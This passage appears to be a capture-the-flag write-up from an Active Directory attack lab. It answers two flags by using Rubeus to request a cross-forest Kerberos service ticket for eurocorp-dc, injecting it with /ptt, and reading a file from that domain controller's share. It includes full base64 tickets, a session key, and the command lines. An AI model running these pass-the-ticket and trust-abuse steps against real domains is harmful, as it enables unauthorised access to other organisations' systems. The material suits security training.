[*] base64(ticket.kirbi):

      doIF5jCCBeKgAwIBBaEDAgEWooIEyDCCBMRhggTAMIIEvKADAgEFoRAbDkVVUk9DT1JQLkxPQ0FMoi0w
      K6ADAgECoSQwIhsEY2lmcxsaZXVyb2NvcnAtZGMuZXVyb2NvcnAuTE9DQUyjggRyMIIEbqADAgESoQMC
      AQ6iggRgBIIEXGT5K1k9Ru07eD134Hq+OtD/MzTqtJlzJOHgITw/wlwiYM++piMiZ4a79EvT05bEzgjN
      lpTV6ta5K+qm2BS7Q0a97Xec0/4p0C0D8Nm8aOdkai5SylYAla2rFT0s4Qdah5Ej4fDDc22Wr9VI/XL4
      ieXPIQyM2DQfVGGtqZ8HG68io8vUjnNe4RVGhPr1cRZUp+rLlFUwOb6Oipdt6PVxhfQB1Q0jw6ZR6C3w
      jRfYA/JrZhlXXoviW6QSfYAOBJhQfDKRf5tm+UZK6wRWe1IZxpq5eLwKJC1FcFNya6KvdNa5z7wkYidm
      dVjfLUOJqLLRmIY+Q4SehcJIffKzo1zeYMMTxnBGR3E+J3D/i7qD25baFCz2BWq2nM7oQ+pKxmVWJwIT
      ujIE0vwB5uu+toFbXX+PbruZYBqE9BcBgWNODZttFGsZDcR30mzd+zTitZY76W78mvFIwOR9EXErM2ew
      FWZaa2cg1xcVNvU1T/Nhv6O18VmF8D9YI76Ig9Sa7nLtSvMzr07GYVxdPbYkOX96cbZ5aWB2nCIdhfmP
      DtN9TKFbzv44zAcFRRzceUkWfHMztBOQLao7c/zaXF9pZmdGVOnu9cLfr8LdJ8YNC4bGe5fe9oGkaUz+
      CdJuD+zd+0Cv9iHaOy5R/+x2u1fhgNhI9SN/cUu3CyujMXMny5QARs6Xo6TMNEdo5NwJvdbaw74fusoG
      uHlxOlnP7rqNR5vu1Rl1yLPAF2F3uwhtmv/inTtjeg5GX5IB882bw62DjR7GC+cb6nG4nrk1PznLv16z
      fpIHoiGMW47NJ18Bu2eAF0DH7JHAzmhBEJLpp+fU+l1gzk13m+ugW6UHp/+HlXSI9A9k+T9cD5t75EnY
      W+k7R3iMW2iDKxnWdzK9qT1PfYjHy4Ci1VXFSklkLsbrQYixTQ4HLVJ3plAC0knogmtXsAteHry53rNN
      BKAVPYJVKuNhgYO52F1emVFIo9Yr44oPhi6//efGCsVwN9PKrqa57qk+IDiS6SuIC8nEtba+RUjLj78x
      hM1glKV4+3+aGcpQaeW9W4m7tGF+n5wvAZrB04hrEZZv2/j6P8eBG1/3CHOJJHeSbLvBjFXEz6bwNCJ8
      NCO1IRCCOkwIV9GW7G3rt++yf1dLhmtpjeAD/78v6dvZpHILJOw8e55Df3KcHIQ58zK3DRCF4oTFUrQV
      Fc7QC6F/XNqBgJyZAcqhZx/3ZmjXVEkp2ky6AsooKkHPMBhfo3YK9rvy4bm4HgLEh+7UDsAzpOmy8Ac0
      36KSK5eZz22m9a1T0fYdHWSk8TTAcpc0b5iAzBUCTPFVNF9qckGYast3Wst8PIGnAXNoVNPyUB7rdtVm
      uDXHxuiwzb1WhS9r974LkV421pMdO7hBVbNBvorTpPByoDywMvTSP684CNxNQ5KqavU5sCnia/ZDBBjH
      yN1115j+zArDpL4kMmYS1oWoZ+IFCjXBTA6av3iJzKGFNJmtLDYuRtq8uTr+TqOCAQgwggEEoAMCAQCi
      gfwEgfl9gfYwgfOggfAwge0wgeqgKzApoAMCARKhIgQgD/FM7NPPc4tNwttPm7f4rRSpwUvZ+q4VP4QY
      pMNRhRKhHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUyiGjAYoAMCAQGhETAPGw1BZG1pbmlzdHJh
      dG9yowcDBQBApQAApREYDzIwMjUxMTIxMTUyMDE2WqYRGA8yMDI1MTEyMjAxMTc0NFqnERgPMjAyNTEx
      MjgxNTE3NDRaqBAbDkVVUk9DT1JQLkxPQ0FMqS0wK6ADAgECoSQwIhsEY2lmcxsaZXVyb2NvcnAtZGMu
      ZXVyb2NvcnAuTE9DQUw=

  ServiceName              :  cifs/eurocorp-dc.eurocorp.LOCAL
  ServiceRealm             :  EUROCORP.LOCAL
  UserName                 :  Administrator (NT_PRINCIPAL)
  UserRealm                :  DOLLARCORP.MONEYCORP.LOCAL
  StartTime                :  11/21/2025 7:20:16 AM
  EndTime                  :  11/21/2025 5:17:44 PM
  RenewTill                :  11/28/2025 7:17:44 AM
  Flags                    :  name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  D/FM7NPPc4tNwttPm7f4rRSpwUvZ+q4VP4QYpMNRhRI=




C:\Users\student98>klist

Current LogonId is 0:0x2d1a0029

Cached Tickets: (1)

#0>     Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
        Server: cifs/eurocorp-dc.eurocorp.LOCAL @ EUROCORP.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 11/21/2025 7:20:16 (local)
        End Time:   11/21/2025 17:17:44 (local)
        Renew Time: 11/28/2025 7:17:44 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:

C:\Users\student98>type \\eurocorp-dc.eurocorp.local\SharedwithDCorp\secret.txt
Dollarcorp DAs can read this!
C:\Users\student98>dir \\eurocorp-dc.eurocorp.local\SharedwithDCorp\
 Volume in drive \\eurocorp-dc.eurocorp.local\SharedwithDCorp has no label.
 Volume Serial Number is 1A5A-FDE2

 Directory of \\eurocorp-dc.eurocorp.local\SharedwithDCorp

11/16/2022  04:26 AM    <DIR>          .
11/15/2022  06:17 AM                29 secret.txt
               1 File(s)             29 bytes
               1 Dir(s)   7,447,212,032 bytes free

C:\Users\student98>

 

Note that the only way to enumerate accessible resources (service on a machine) in eurocorp would be to request a TGS for each one and then attempt to access it.

Flag 31 [eurocorp-dc] – Service for which a TGS is requested from eurocorp-dc 🚩

Based on the following command:

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgs /service:cifs/eurocorp-dc.eurocorp.LOCAL /dc:eurocorp-dc.eurocorp.LOCAL /ptt /ticket:doIGPjCCBjqgAwIBBaEDAgEWooIFCjCCBQZhggUCMIIE/qADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOCBKYwggSioAMCARehAwIBA6KCBJQEggSQ4QjUtbjC+gqIJbxbmO/BVEPMq5XbSWgLgkzDExG39gcNGB9k1qDWxfKTzXsDojjlDr4K45eKvRiYBbZHHptmTOMc/cwQxdBGPqD4Zl7/4Uc0HgPUHjWRvAFBefRSrWGwYqgJcWfLS9oHSFONNWw8lWlV9gio2rf1xb9Vdxo+N/7XtHUU0eYN/bg7P/23tvTnD9MebLf55qQ92uiqCjwvQnO2Kiw6Oq10uOG2L6csVHHIfuIzpbdmAxvNmFA/+7jD7f130YyPaQbuFLe7j/zSQu3hNusEAGn+QguivEe1+Z3jt5p587xLJu9dGCfOkFwLsgKUMYoP8JK3Qho3GrUWKsseVyMnk3mCobbAqPFZpanjiHCBOpa+mJP0rzE0tPc3jx6YPT9ZnVKX5sl7uIPcXWgIQiT/RvxXaHsh5cEr4aT4kqDGtOfZdNAHKCLZ7RGw6mXh6MeXYpSlIB70l9EwRiLMM9D0s/igxvgdC2kI0NuJKbc8yd4+51BAEcH7t7pVNacMCKYNjadsMTyOvnCxU3trsMY+JhXZ2yf0AZORb3Th5BK+MzRfJRij5OtFMsUmy1eCNbiJ35PulMonPYTsJBYAnJ4vhwxiTnVqNonII3+FWy06gPZ6X1Hrdb4SGeBkRrJAMMMxGJf7MAahZ5xZcEvofngAMrXClluJKSkF/Ut+0u2bn4zwytcBDAOq5luMFb3uQe9KIbqXw+pbtCZUhQW0P1NokQEG16QWHcx695kUbLsRTYGlTxGhEWiAQVR1LJLTnjsZTffd5P3jaIE4bNNBWtnJHFKE4Scpo9kk7DZyVo0HoAZ1srZ473QvVh8/+4y4Q6tMNLugA81ULZhVZZqegdeo/SkFx/A964AHCWBj22hTmGQ1nQ1DwqCcM6eE85sLFYkg3a0BIIL+1JO9XWjTbvabWBVXJBAaK3SOTQU/Z1Spe9Fbp6iJl9Nx9jK2swg8/H0Duah7nKBOKrIWjbINBCOZlarJpoW44KFvHOE9JspNtwE09JS2gTtQBxJbjMNIfTl106p20tAYk4pG8pjb1T01ECq92qTyWPg3uVjDKWA5vcgLNxk9VKVHbnKpb84olGnDZNFKOWuAyzKs2YEySVp2ItvY4vdD79/e6d+grEME48vB4jwakQEG8BxHuZSqYcT3oZ70rzTVg5D0kq7qI/Yj/OPSPGbH7RmQVx04PwjXgCPgEPHjKxb2UPXtIhdjy21tqD7BL7snXXlzaM/cErEmhH21ZYvQRyXXz2fd6I/X05YZlkM4XoVfMKCBsHacg8m0ilGyLw48i+4RxdC9T58VYdAdJo/qZRqe5ynq2K2zzXjyWfU+NYokOobgqzwTRpiXKngPp017lcJA1b+JGkG3HImTg+l/EhDrdRNaTXmTbGF8WCE55S1Og7uNJ6BzHERRZQPJvoK/JG2FVGGi9lA7YzlgcUMfWTRhyinqUpcTE+bCLt8OfHgFhj9grLVTF5N2NNL1T3XxHRyabq72LL8HQVCE7phzGl3rYqGRJgeV4vcl0Mgy9G846Nxo08JfoN+x3+XhrKaweZMoM6OCAR4wggEaoAMCAQCiggERBIIBDX2CAQkwggEFoIIBATCB/jCB+6AbMBmgAwIBF6ESBBAhgr+5T4BzgkqMZmt9+refoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQKAAAKQRGA8yMDI1MDUxOTIxMjQzN1qlERgPMjAyNTA1MTkyMTI0MzdaphEYDzIwMjUwNTIwMDcyNDM3WqcRGA8yMDI1MDUyNjIxMjQzN1qoHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypLzAtoAMCAQKhJjAkGwZrcmJ0Z3QbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FM

cifs is the service for which a TGS is requested from eurocorp-dc.

Flag 32 [eurocorp-dc] – Contents of secret.txt on eurocorp-dc 🚩

type \\eurocorp-dc.eurocorp.local\SharedwithDCorp\secret.txt

Dollarcorp DAs can read this!